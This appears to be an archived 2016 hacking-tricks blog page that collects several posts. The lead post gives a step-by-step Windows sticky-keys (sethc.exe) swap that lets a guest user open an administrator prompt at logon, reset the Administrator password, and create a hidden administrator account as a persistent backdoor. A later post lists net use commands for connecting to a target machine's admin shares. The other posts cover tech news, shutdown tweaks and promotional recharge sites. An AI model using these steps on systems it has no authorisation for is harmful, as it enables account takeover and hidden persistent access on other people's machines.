Pages

Saturday 23 July 2016

How to Hack Admin Password using Guest login.

 



Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.  
Prerequisites
 
Guest account with write access to system 32.

Procedure To Hack windows XP administrator Password

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have hacked admin through guest accountMethod 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where " How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new " DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever enjoy

Thursday 21 July 2016

Pokemon Go Hack: How To Find Exact Location Of Every Pokemon By Using This Map

 

Short Bytes: If you are tired of tracking down your favorite Pokemon, we’ve got a great hack for you. A developer has written a python script that lets you see the location of every Pokemon on Google Maps. You need to open the command line and follow his detailed instructions to get things done. To make the installation process more user-friendly, the developer is working to design a simple interface without any use of command line.
The fun of tracking down new creatures in Pokemon Go has turned into an addiction all across the globe. If you are probably feeling tired after playing Pokemon Go for hours, we understand that.
But, what if you get a map that shows the exact location of every pokemon around you, making the game very easy? Thanks to a bug in the game, someone has come up with a version of a Google Map that shows every pokemons around you.
Before going into more details, let me tell you that to view this map, you need to have the knowledge of command line. This project was spotted on Redditwhere a developer named Ahmed Almutawa posted the detailed instructions.
Somehow, he was able to pull raw data out of the game, including the locations of pokemons, gyms, and individual pokestops. Within a few hours, he plotted that data on a map and posted the project on Reddit and GitHub.
As said earlier, you need to open up your command line and run a python script. So, it’s not some smartphone application or web app that just invloves a simple click-and-install.

After getting things done, you’ll be presented with a Google Map that shows a bird’s eye views of every pokemon, gym, pokestop etc. around you. By tweaking a little bit with code, you can apply filters to locate specific pokemons.
Almutawa told The Verge that he and other developers are working to make this project more user friendly. They are working to create an interface that will let you install the map easily and avoid the command line stuff.
Thanks to the overwhelming populalrity of Pokemon Go, such projects and hacks are mushrooming all across the web. It’ll be interesting to see which approach will be adopted by Nintendo and Niantic.
“It is Niantic’s game and they’re free to do with it whatever they do,” Almutawa says. “I do hope that they’re fine with the map itself [and] it’s not causing them any issues.”
Did you find this article helpful? Don’t forget to drop your feedback in the comments section below.
Source Fossbytes

Wednesday 20 July 2016

Best CMD commands used in hacking

 

Top CMD or MS-DOS prompt commands which every hacker should know

If you have been following Techworm regularly, chances are you are a very versatile hacker in your own right and don’t need to know these commands. But many of our readers who are beginners and want to learn hacking always ask us for the top Dos Prompt (C:/ or CMD commands in Windows 10/7/8.1) they should know. So here goes.
CMD is a power tool which lets you do almost anything with your PC/laptop. There are common commands like CD.. and MD etc which you probably know so we wont get into that. Here are some really useful things a hacker can do with CMD commands.
First, open your Network Connection and right click and select Properties. Then Select TCP/IP and clickProperties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.
Now back to the main Local Area Connection window, select File and Print Sharing for Microsoft Networks and hit enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD. In case you don’t know how to get CMD by clicking the Windows icon at the left-hand bottom of your screen in all Windows versions and click on Start. Press run from the start, then type “cmd” without quotes.
Now here are the important commands which every wannabe hacker should know :

nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig

In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up on your screen. Read it to understand what that particular command does.
Let’s start easy…
1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command.
ping x.x.x.x (x is the IP address). You can try pinging 8.8.8.8 which belongs to Google
or
ping www.google.com (www.google.com is the website you want to ping, but you don’t know the IP)
2) nslookup : This command has many functionalities. One is for resolving DNS into IP. Lets say you know the website URL but you don’t know its IP but you want to find it out.
Eg. nslookup www.google.com (www.google.com is the website for which you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs
nslookup (enter)
set type=mx (enter)
yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn’t it? You can send a spoofed email to your friends using the IP address of the mail server. You can check the tutorial here for sending spoofed email.
3) tracert : This command will give you the hops that a packet will travel to reach its final destination. This command is really helpful if you know the route a packet takes before it goes to the target box.
tracert x.x.x.x (x is the IP address)
or
tracert www.google.com (www.google.com is the website you don’t know the IP)
4) arp : This command will show you the arp table. You can find out if anyone has done arp poisoning in your LAN using this command.
arp -a
5) route : This command will show you the routing table, gateway, interface and metric.
Code:
route print
6) ipconfig : This command will show you a lot of useful things like your IP, Gateway, DNS in use, etc. This command will give all that info but for all networks you might have it.
Code:
ipconfig
or
Code:
ipconfig /all
Also, in case you have a dynamic IP and want to change it, then type…
Code:
ipconfig /release (this will release your IP)
ipconfig /renew (this will renew your iP)
7) netstat : This command will show you connection stats
Code:
netstat
or
Code:
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above)
net view x.x.x.x or computername (will list the available sharing folders on the target box)
Here are some additional CMD commands which will help you.
Code:
net use \ipaddressipc$ “” /user:administrator
(this command will allow you to connect to the target as administrator)
Now if you want to connect to the target and browse the entire C drive, then use this command:
Code:
net use K: \computernameC$
(this will create a virtual drive on your “my computer” folder)
Please not that this command will only work if the target PC/laptop has not set a Adminastrator Password.
And least but not last, the “help” command.
Quote:
whatevercommand /help
or
Quote:
whatevercommand /?
This command is very useful in finding what a particular command does, especially if you are a newby.
Hope you liked the CMD commands listed above. If you have found any command other than those listed above, kindly note them in the comments for our other readers.
Source Techworm

40 Million iCloud Accounts Hacked? Hackers Hold iOS Devices To Ransom

 

Massive 40 Million iCloud Accounts Hack Could Hold Apple Devices Hostage For Russian Ransomware

Apple’s iCloud account appears to have been so severely hacked by some urbane hackers that some iPhones have essentially been held hostage for Russian ransomware. It is guessed that an astounding 40 million iCloud accounts (approximately) are rumoured to be at risk, according to CSO Online.
Some iPhone users, dating back to February this year, have discovered that their devices have been compromised, and are held hostage by Russian hackers. The attack is almost too simple.
An iCloud account is broken into (with the help of leaked credentials), and the service’s “Find My iPhone” feature.
“It starts with a compromised Apple ID. From there, the attacker uses Find My iPhone and places the victim’s device into lost mode. At this point, they can lock the device, post a message to the lock screen and trigger a sound to play, drawing attention to it.
In each of the cases reported publicly, the ransom demanded is usually $30 to $50. If a victim contacts the referenced email address, in addition to payment instructions, they’re told they have 12 hours to comply or their data will be deleted,” said CSO security blog Salted Hash.
If a slew of iCloud accounts are breached, you can multiply that $30 – $50 by 1,000 or even more, and the scheme suddenly looks rather lucrative to the hackers.
Earlier this week, a security professional posted a message to a private email group requesting information related to possible compromise of at least 40 million iCloud accounts.
Salted Hash started excavating on this story after the email was received. In it, a list member questioned the others about a rumour concerning “rumblings of a massive (40 million) data breach at Apple.”
The message goes on to state that the alleged breach was carried out by a Russian actor and vector “seems to be via iCloud to the ‘locate device’ feature, and is then locking the device and asking for money.”
The report adds that “for now, let’s assume there hasn’t been a massive iCloud data breach.” Apple has not commented on the matter.
Given that the Apple ID credentials involved in the ransom attacks are believed to originate from online security breaches, Salted Hash pointed towards a recently compromised Mac-Forums.com database, which allegedly includes 291,214 accounts, being sold for around $775 on the darknet.
However, some security experts are claiming that the victim count of 40 million is likely way overblown. It does make sense, because even if only a small percentage of the list were being attacked, a few hundred thousand victims within a few months would standout like a beacon. In short, there would be no way to keep such attacks under the radar. That’s not a glitch that would escape Apple’s radar, as you can imagine.
At this point of time, there is no evidence to suggest that the Mac-Forums database has any relation to these ransom attacks. However, if you wish to tread caution, it is highly recommended that you immediately change your iCloud password, and if you haven’t already, enable two-step verification. Both these changes can be done inside of your iCloud Settings screen.
Source: CSO Online

Facebook, Netflix & HBO Go Password Sharing Is Now a Federal Crime

 

Sharing passwords on Netflix, HBO Go & Facebook would now be counted as a violation of the Computer Fraud and Abuse Act.

The Ninth Circuit Court of Appeals issued a ruling this week that officially considers sharing passwords counts as a violation of the Computer Fraud and Abuse Act (CFAA). Both Netflix and HBO Go passwords fall into this category. Also, if you are not careful, getting caught sharing these passwords could result in jail time.
This new law was set up as a catch-all for hacking has been widely used to prosecute behaviour that bears no resemblance to hacking. This ruling specifically references the case of David Nosal, a former employee of the International research firm Korn/Ferry, who used a co-worker’s password to access a computer after his access was revoked.
The decision is a nightmare scenario for civil liberties groups, who claim that such a broad interpretation of the CFAA means millions of Americans are violating the federal law every time they share account information in regards to sites such as Facebook, Spotify and the many other popular streaming services, which also include Amazon Prime and Hulu. Judge Stephen Reinhardt, who presided over this latest ruling noted the following.
“[This ruling] threatens to criminalize all sorts of innocuous conduct engaged in daily by ordinary citizens.”
Judge Margaret McKeown, who was in the majority vote, had this to say about the unprecedented ruling.
“Nosal and various amici spin hypotheticals about the dire consequences of criminalizing password sharing. But these warnings miss the mark in this case. This appeal is not about password sharing.”
McKeown’s viewpoint is that the issue is not about password sharing per se, but that it’s about the one employee who had no authority from the firm to give her password to any former employees, which plays into the CFAA’s language that states it’s illegal to access a computer system “without authorization.” McKeown fully believes that phrasing is concrete and without wiggle room, according to Motherboard.
McKeown goes onto state the following.
“Without authorization [is]an unambiguous, non-technical term that, given its plain and ordinary meaning, means accessing a protected computer without permission.”
The big question this raises is, ‘Who gives the authorization?’ While Nosal wasn’t granted authorization by Korn/Ferry to use the password, he was authorized the use of the password by the friend in charge of maintaining the password for security purposes. What the ruling declares in the long run is that we are no longer authorized to give a friend or loved one our Netflix or Facebook password. Only Netflix or Facebook as a company can specifically authorize who gets to use the password beyond the person who is assigned to the account. Once you share that password without getting an ok from the source company, you are in direct violation of breaking federal law.
However, Judge Stephen Reinhardt disagreed, who appears to be an authority on hacking. Reinhardt expressed concern that decision by the majority criminalizes all password-sharing, including giving out your parent’s Netflix password to your friends. In a dissenting opinion, he writes:
“This case is about password sharing. People frequently share their passwords, notwithstanding the fact that websites and employers have policies prohibiting it. In my view, the Computer Fraud and Abuse Act (“CFAA”) does not make the millions of people who engage in this ubiquitous, useful, and generally harmless conduct into unwitting federal criminals.
“In the everyday situation that should concern us all, a friend or colleague accessing an account with a shared password would most certainly believe-and with good reason-that his access had been ‘authorized’ by the account holder who shared his password with him. The majority does not provide, nor do I see, a workable line which separates the consensual password sharing in this case from the consensual password sharing of millions of legitimate account holders, which may also be contrary to the policies of system owners. There simply is no limiting principle in the majority’s world of lawful and unlawful password sharing.”
He accused his colleagues’ decision “loses sight of the anti-hacking purpose of the CFAA, and despite our warning, threatens to criminalize all sorts of innocuous conduct engaged in daily by ordinary citizens.” After all, in their terms of service, Netflix and especially HBO Go say only subscribers should be streaming their content. It was also noted that each of the 50 states have their own, more narrow rules and laws when it comes to computer trespassing. It is Reinhardt’s belief that this particular case would have been better suited for civil, not criminal, proceedings.
This ruling in the long run is unlikely to affect anyone who is currently sharing their social media or streaming passwords, unless HBO and Netflix unexpectedly decide that they want to indict millions of their customers. At this point, neither company has made a move to do so. But an example has been set, and should get anyone thinking about sharing their password with a third party pause.
Source: Motherboard

How to Use Facebook without Internet

 





The only thing You have to do is to  dial *325# and follow the instructions.


First of all it asks for Facebook username and password,You have to enter these information via a number based command Prompt.

After You get in.You will see a menu like this :-
  • News feed
  • Update status
  • Post on wall.
  • Friend request.
  • Messages.
  • Notifications.
  • Account settings.
You have to enter desired Number in a number based command prompt for accessing your account


NOTE:


This Service is only avaliable in India.


This Service is Currently available on selected operators like Airtel, Aircel, Idea and Tata Docomo users.

Access to Facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.

Tuesday 19 July 2016

3 Ways To Speed Up Windows 7,8 & 10 Shutdown Process

 






One of the key improvements of Windows 7 is its lightning fast start-up. Aaron Dietrich of the Windows Client Performance team received a lot of praise for this achievement. However, what the developers apparently failed to optimize and speed up was the shutdown process.
Ever since I switched to Windows 7 on my laptop, which had previously shut down within seconds while running on Windows XP, the slow shutdown has been nagging me. If you also happen to be looking for ways to kick-start a Windows 7 slow shutdown, look no further! Here I will introduce you to 3 ways to optimize or speed up the logoff process, so that you can leave the office or get into bed faster.

Prologue

I tested these tips one after the other on my Windows 7 netbook (which shut down significantly faster after upgrading to 2GB RAM). I booted into Windows, started some standard programs, including Skype and Chrome with several different tabs open, waited until they had fully loaded, and then shut down the computer. In its native state, the shutdown took 32 seconds from clicking the ‘Shutdown’ button until the laptop had fully shut down.
Initial shutdown time on test machine: 32 seconds

1. Reduce Timeout To Kill Service Or App

Before Windows shuts down, it attempts to properly close all running processes. If a service doesn’t close immediately, Windows waits for a few seconds, until it prompts the user that the service is not responding to the shutdown request. The amount of this waiting time is defined by registry keys and you can reduce it.
These are two fairly harmless registry hacks. If you follow the steps outlined in this article, it should in no way harm your system. Nevertheless, I have to issue a warning:
Editing the registry can damage your operating system! I or MakeUseOf take no responsibility whatsoever!  Make a backup of your registry before continuing.
For the first hack, click the key combination > [WINDOWS] + [R], type > regedit into the text field, and click > OK to launch the registry editor.
In the registry editor, navigate to this folder:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Within that folder (on the right) find and double-click the string > WaitToKillServiceTimeout.
In the > Edit String window, change the > Value data from the default of 12000 (12 seconds) to 2000 (2 seconds). Click > OK to save the change.
For the second hack, navigate to the following location via the registry editor:
HKEY_CURRENT_USER\Control Panel\Desktop
On the right, find and double-click the string > WaitToKillAppTimeout.
If this entry does not exist, you can create it. Right-click into the folder and click through >New > String Value, and name it > WaitToKillAppTimeout.
Set > Value data to 2000, click > OK.
In the same registry folder, if you see an entry called > AutoEndTasks, set its > Value data to 1, then close the registry editor.
Shutdown time: 27 seconds

2. Create a Fast Shutdown Shortcut

As of Windows 2000, Windows has come with a remote shutdown tool to shut down and restart Windows. You can control this tool through the command line, but a much faster alternative is to create a shortcut.
  • Right-click your Windows 7 desktop and select > New > Shortcut.
  • Enter > shutdown.exe -s -t 00 -f in the location field, click > Next, give the shortcut a descriptive name, e.g. Shut Down Computer, and click Finish.
The letters (options) added above tell the tool to shut down (-s) with a timeout of zero seconds (-t 00), and to force running applications to close without forewarning the user (-f). Basically, it unites the registry hacks from the first tip in the shutdown process. You can see a full list of options when typing > shutdown.exe into the command prompt, which you can open via > [WINDOWS] + [R] then type > cmd into the text field and click > OK.
You can move this shortcut from the desktop to your quick launch bar or pin it to the taskbar. Double-click the shortcut to instantly shut down the system.
This trick is courtesy of Seven Forums.
Shutdown time: 24 seconds

3. Brute-Force Method

This method is also known as hard boot, as it is typically used to shut down and immediately reboot the computer. It should be used with extreme caution!
If you’re in a hurry and cannot wait for 20 seconds or if your computer responds slowly or even froze, simply hold the power button for several seconds and Windows will shut down immediately. Since this method literally kills not only the operating system, but also the hardware, it should not be used as a routine way of shutting down your computer. In a worst case scenario, it could cause your hard drive to crash.
Shutdown time: 5 seconds

Epilogue

Finally, you may experience an issue that can not be solved with the two hacks above. If you see a message saying “1 program sill needs to close: (Waiting for) Task Host Window”, then you should look into this Hotfix released by Microsoft.
Moreover, a slow logoff can be caused by outdated drivers or antivirus software. Therefore update all your drivers, remove antivirus programs like Norton and McAfee and replace them with a better alternative, such as Avast or Avira AntiVir. Note that fingerprint scanners have been known to cause a particularly slow log-off.

Top 10 Free Mobile Recharge's Earning Sites

 



Hey Readers, As We all know nothing is free in this world, for earning money we have to do some certain task, But At last I got a amazing sites of Free Mobile Recharge and online earnings, It works 100 % and easy to use. You get paid starting from the very first action of yours  Registration, other activities which pay you are E-Mail verification, Successful Referrals by Email/sms, Every time you send any sms. So the more you send, the more earnings will go in your wallet. The amount earned by the user can be redeemed in the form of Mobile Recharge.





↓↓ Here Are The TOP 10 Genuine Sites For Free Mobile Recharge & Online Earnings ↓↓


Best site amongst all, that's why I keep this on first position. My favourite website for free mobile recharge. Joining Bonus Rs.10 and get Rs.3 for per referral, minimum recharge amount Rs.10.
 Click Here to Join.



Join and Earn Rs.5 as a joining bonus. You can earn more by refeering others, per referrals you will get Rs.5. Click Here to Join.




Join & earn 50 points. 10 points = Rs.1. You can earn points by adding friends and sending sms to others. Minimum recharge Rs.10.  Click Here to Join.




Complete simple surverys and earn free mobile recharge. Earn Rs1 for per referrals and minimum recharge is Rs.10. Click Here to join.



Earn through referrals and complete quick surveys & offers for free mobile recharge earnings. Click Here To Join.






Another site which pays you for sending sms. Send Sms and Earn 2 paise / sms. Apart from sending sms, you can earn by playing quiz, refer others and get Rs.1 instantly, Joining bonus Rs.2, Minimum recharge Rs.10. Click Here to Join.
Joining bonus Rs.2, Earn 2 paise for per sms and Rs.1 for per referral, minimum recharge amount Rs.10. Click Here To Join.




Joining Bonus Rs.2 , enter guesses and get 30 paise for per guess, minimum recharge amount Rs.10. Click Here to Join.






Awesome site for free sms sending, invite friends and get Rs.1 for per referral.
 Click Here to Join.






Click On Ads and Earn Money. Minimum payout Rs.500 through cheque.
Click Here to Join.
Here U Will get money if u click on ads and refer other.
Click Here to Join.







Complete simple surveys and refer friends for free recharge earning. Minimum recharge Rs.10.
 Click Here to Join.




Get updates in your email box

Complete the form below, and we'll send you our recent update.

Deliver via FeedBurner
© Copyright 2016 CS Tricks. .